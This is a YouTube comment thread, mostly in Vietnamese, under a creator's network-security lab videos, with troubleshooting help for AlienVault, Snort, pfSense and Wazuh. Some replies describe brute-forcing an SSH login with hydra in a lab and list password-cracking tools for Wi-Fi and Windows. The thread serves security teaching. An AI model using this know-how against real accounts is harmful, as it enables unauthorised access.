      @atuanlab 3 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! - Bạn thử xem lại thiết lập mạng của máy WinSer 2016 thử xem (Xem IP, GW và DNS). Trong Video thì mình dùng dạng NAT trên VMware để ra Internet. - Còn không thì bạn thử để cấp động đi, nếu ra được Internet thì bạn xem lại thiết lập mạng (Ethernet() > Status), xem IP cấp động rồi chỉnh lại thành tĩnh.

    • @phuchoang7202
      @phuchoang7202 3 หลายเดือนก่อน

      @@atuanlab để tôi thử xem, cảm ơn

  • @tronglongnguyen3558
    @tronglongnguyen3558 3 หลายเดือนก่อน

    a lam them video ve chu de nay di a

    • @atuanlab
      @atuanlab 3 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! Mình sẽ thêm nhiều video về những chủ đề như thế này trong tương lai.

  • @otri9396
    @otri9396 5 หลายเดือนก่อน

    cho mình hỏi là mục đích của cấu hình hệ thống và tấn công để tìm ra được mật khẩu của tài khoản web phải không ạ?

    • @atuanlab
      @atuanlab 5 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! - Mục đích của hình thức tấn công vét cạn bằng từ điển (dictionary attack) là tìm ra mật khẩu của tài khoản người dùng (dựa trên tính chất mật khẩu không đúng quy định hay đã bị lộ trong những cuộc tấn công khác). Trường hợp này thì mình dùng "hydra" trên Kali để vét cạn mật khẩu đăng nhập cho tài khoản "anhtuan" thông qua dịch vụ truy cập từ xa SSH dựa trên một tập tin chứa các mật khẩu thu thập được. - Mục đích của việc cấu hình AlienVault là để thiết lập một hệ thống giám sát sự kiện và bảo mật, giám sát các hoạt động của máy Client và Server. Trường hợp này là giám sát máy Ubuntu Server và cụ thể là tập tin liên quan đến log (như auth.log). Nên khi kẻ tấn công thực hiện vét cạn sẽ lần lượt thử các mật khẩu khác nhau trong tập từ điển, mỗi lần đăng nhập thất bại hay thành công đều được ghi nhận trong log và hiển thị thông qua Alienvault.

    • @otri9396
      @otri9396 5 หลายเดือนก่อน

      @@atuanlab ngoài kiểm tra bằng hydra thì còn có cách nào kiểm tra nữa không ạ.

    • @atuanlab
      @atuanlab 5 หลายเดือนก่อน

      @@otri9396 Nếu mà bàn về "Bruteforce" hay tương tự để kiểm tra và crack thì nhiều lắm, có thể kể đến như: - Aircrack-ng, Hashcat : bộ này thì mình thường dùng Crack password wifi ấy. - John the Ripper: trình này thì tương tự Hydra. - Ophcrack, L0phtCrack: này dùng cho crack password của Windows.

    • @otri9396
      @otri9396 5 หลายเดือนก่อน

      @@atuanlab mình cảm ơn ạ, mình cài alien tới đoạn xong rồi vào web thì không vào được nên phần sau mình không thực hành dc

    • @atuanlab
      @atuanlab 5 หลายเดือนก่อน

      @@otri9396 Nó hiển thị như thế nào ? Hồi đó mình làm cũng có lần không vào được Dashboard của Alienvault, ping được IP của Alienvault nhưng không vào được web, chỉ hiện lỗi không truy cập được. Mình tìm ra là do phiên bản bảo mật TLS của Alienvault cũ nên các trình duyệt mới bị giới hạn, mình dùng Firefox và chỉnh "security.tls.version.min" thành 1 trong "about:config". Lúc này thì mới hiện ra thông báo như là truy cập không an toàn, nhấn tiếp tục thì mới vào được Dashboard của Alienvault.

  • @sonhoangtrinh5910
    @sonhoangtrinh5910 5 หลายเดือนก่อน

    Em chào thầy. Thầy có thể làm những lab tiếp theo luôn được không ạ

  • @akirachin6342
    @akirachin6342 5 หลายเดือนก่อน

    Bạn ơi cho mình xin file cmd với

    • @atuanlab
      @atuanlab 5 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình (^.^). Ý của bạn là file note phải không, nếu là file note thì bạn có thể tham khảo trong Google Drive - Môn Học (Link trong phần mô tả) - File Notes: drive.google.com/file/d/1ZuMFfpHQrRGKvRiSZI14yMVYCyS945pT/view?usp=drive_link - File báo cáo: drive.google.com/file/d/1C0gTOuB2OEFkReBI3OVovR-DkJ_3s56i/view?usp=drive_link

  • @quyenbanchukenh1240
    @quyenbanchukenh1240 5 หลายเดือนก่อน

    tui đang dính chỗ cài web server bạn giúp tui được không ?

  • @leBinh-v3s
    @leBinh-v3s 6 หลายเดือนก่อน

    làm thêm ít bài demo về phần mềm này đi bạn ơi, xin cách làm đẩy thông báo về email nữa với

  • @thangnguyenuc7970
    @thangnguyenuc7970 6 หลายเดือนก่อน

    anh có bài báo cáo không , anh có thể cho em được không ạ

    • @atuanlab
      @atuanlab 6 หลายเดือนก่อน

      Cảm ơn cậu đã xem video của mình! Tớ sẽ cố gắng cập nhập link tổng hợp để tiện cho việc tham khảo. - Link bài báo cáo : drive.google.com/file/d/15XETofjMFvAuL0PTupGn_RmJT9PL4u40/view Cậu cũng có thể liên hệ qua Email của mình: ng.atuanlab.yt@gmail.com

  • @atuanlab
    @atuanlab 6 หลายเดือนก่อน

    Cảm ơn các bạn đã dành thời gian xem video của mình !!! Video này là bài Lab đầu tiên (lab 01) của môn "An Toàn Mạng Máy Tính" (phần thực hành). Theo mình thì nội dung không quá dài, nếu theo tài liệu thì chỉ cần thực hiện trên Windows Server 2008 là được rồi nhưng lúc mình học thì thầy bảo làm thêm phần thiết lập các dịch vụ trên cả Linux, cái này cũng đơn giản vì chỉ dừng ở mức cơ bản thôi. Nội dung bài lab này thì không quá khó, có điều là lúc thiết lập Cygwin để cài SSH thì phiên bản hiện tại (bản 3.5.1) không hỗ trợ cho Windows Server 2008 nên phải làm theo vài thao tác nữa để cài được Cygwin. Ban đầu thì mình định làm trên Windows Server 2016 luôn nhưng lúc ấy dịch vụ Telnet Server lại không hỗ trợ (vì tính chất bảo mật nên Microsoft bỏ tính năng này rồi), nên để làm đúng nội dung thì phải sử dụng những chương trình ngoài, nên mình quyết định làm trên bản 2008 luôn nhưng nếu có cơ hội thì các bạn có thể làm. Mà theo quan điểm là cái gì khó thì có Google nó lo nên cứ thế mà làm tới thôi. (^.^)

  • @hoangdung5910
    @hoangdung5910 7 หลายเดือนก่อน

    💼💼💼

  • @vanlongnguyen3054
    @vanlongnguyen3054 8 หลายเดือนก่อน

    cảm ơn anh ạ

    • @atuanlab
      @atuanlab 8 หลายเดือนก่อน

      Ừm, không có chi đâu em.

  • @DuongPham-xe5uu
    @DuongPham-xe5uu 8 หลายเดือนก่อน

    bài này không cần firewall cũng được đúng không nhỉ

    • @atuanlab
      @atuanlab 8 หลายเดือนก่อน

      ừm, đúng rồi bạn. Do bài này mình làm bên bài tập lớn nên mô hình có thêm Firewall chứ thông thường thì không cần, chỉ cần máy Web Server chạy ứng dụng có lỗ hổng Log4j và một máy tấn công là được.

    • @DuongPham-xe5uu
      @DuongPham-xe5uu 8 หลายเดือนก่อน

      uki cảm ơn bạn nhiều @@atuanlab

  • @user-ke4ic9ju4v
    @user-ke4ic9ju4v 9 หลายเดือนก่อน

    cho mk xin file word cài đặt này được ko ạ

  • @kdx5223
    @kdx5223 10 หลายเดือนก่อน

    Xin nguồn thực hiện với bác ơi

    • @atuanlab
      @atuanlab 10 หลายเดือนก่อน

      Bài này thì mình lấy từ nhiều nguồn để thực hiện, bạn có thể tham khảo : - Rule tham khảo : www.hackingarticles.in/detect-nmap-scan-using-snort/ github.com/Simon1207/Snort-Rules/blob/master/local.rules stackoverflow.com/questions/43370531/detecting-ssh-version-scan-using-snort - pfsense + snort : docs.netgate.com/pfsense/en/latest/nat/port-forwards.html www.wundertech.net/pfsense-port-forwarding-setup-guide/ docs.netgate.com/pfsense/en/latest/packages/snort/setup.html hocwebgiare.com/blog-detail/Firewall/post359/Bai-23--Cau-hinh-Snort-hanh-dong-nhu-IDS-hoac-IPS.html - honeypot - pshitt : github.com/regit/pshitt Cảm ơn bạn đã xem video của mình.

  • @binhuwu
    @binhuwu 10 หลายเดือนก่อน

    bạn cho mình xin file câu lệnh ở bên màn hình bên phải được không ạ, tìm k thấy mail của bạn đâu cả

    • @atuanlab
      @atuanlab 10 หลายเดือนก่อน

      Mình gửi bạn bài Note (nội dung note bên phải) trong bài : anhtuan-mylab.github.io/posts/ipsids-tieuluan-note_ossec_wazuh/ Cảm ơn bạn đã xem bài demo của mình.

    • @binhuwu
      @binhuwu 10 หลายเดือนก่อน

      @@atuanlab cảm ơn nha

    • @binhuwu
      @binhuwu 10 หลายเดือนก่อน

      @@atuanlab bạn có thể cho mình xin thông tin liên lạc để hỏi 1 số vấn đề được không mình đang bị gặp lỗi một chút về việc add agent

    • @atuanlab
      @atuanlab 10 หลายเดือนก่อน

      @@binhuwu Bạn có thể liên hệ với mình qua Email (nguyenanhtuan9970502@gmail.com) hoặc là Facebook (facebook.com/atuanlab.fb/ ).

  • @haanh7083
    @haanh7083 11 หลายเดือนก่อน

    Cho mình hỏi có cách nào để snort gửi thông báo khi phát hiện tấn công k ạ (ví dụ gửi cảnh báo về mail, điện thoại....)

    • @atuanlab
      @atuanlab 10 หลายเดือนก่อน

      Theo mình tìm hiểu thì Snort không có tính năng về việc gửi các thông báo đến thiết bị khi phát hiện tấn công nhưng mình vẫn có thể được việc ấy thông quá những hình thức khác. Bản chất Snort là sẽ ghi log cảnh báo khi rule được kích hoạt (tức đang bị tấn công) thì để gửi thông báo, bạn có thể sử dụng các hình thức như : - Sử dụng một phần mềm giám sát log như "swatchdog", hoạt động là khi log thay đổi sẽ gửi thông báo đến email hoặc telegram. - Sử dụng biện pháp giám sát log tập trung như Graylog, graylog cũng sẽ có những tính năng gửi thông báo khi phát hiện tấn công theo thiết lập.

  • @minhleduc6715
    @minhleduc6715 11 หลายเดือนก่อน

    demo lỗ hổng cve-2019-16891 đi anh em search ít thông tin quá

  • @ninnguyen4876
    @ninnguyen4876 ปีที่แล้ว

    không nghe thấy tiếng anh ơi

  • @huyz4266
    @huyz4266 ปีที่แล้ว

    Tuyet voi anh Ba oi